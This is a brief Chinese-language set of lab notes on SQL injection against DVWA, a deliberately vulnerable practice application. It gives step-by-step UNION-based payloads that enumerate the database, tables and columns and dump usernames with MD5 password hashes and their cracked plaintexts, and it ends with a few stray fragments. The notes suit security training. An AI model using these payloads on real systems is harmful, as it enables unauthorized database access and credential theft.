ye

' or 1=1 order by 3 #
查询的时候，数据库返回的查询结果只有两列

这张表使用的数据库是什么？
' union select 1,database() #

分析结果：dvwa

使用的‘dvwa’数据库它有多少张表，表明分别叫什么？
' union select 1,group_concat(table_name) from information_schema.tables where table_schema = 'dvwa' #

分析结果：guestbook,users

已经知道了users表中有我们需要的信息，需要知道users表里面的字段？
' union select 1,group_concat(column_name) from information_schema.columns where table_name = 'users' #

分析结果：user_id,first_name,last_name,user,password,avatar,last_login,failed_login

我们需要的是user，password字段的查询结果
' union select user,password from users #

分析结果：
admin
5f4dcc3b5aa765d61d8327deb882cf99（password）

gordonb
e99a18c428cb38d5f260853678922e03（abc123）

1337
8d3533d75ae2c3966d7e0d4fcc69216b(charley)

yyc
111111111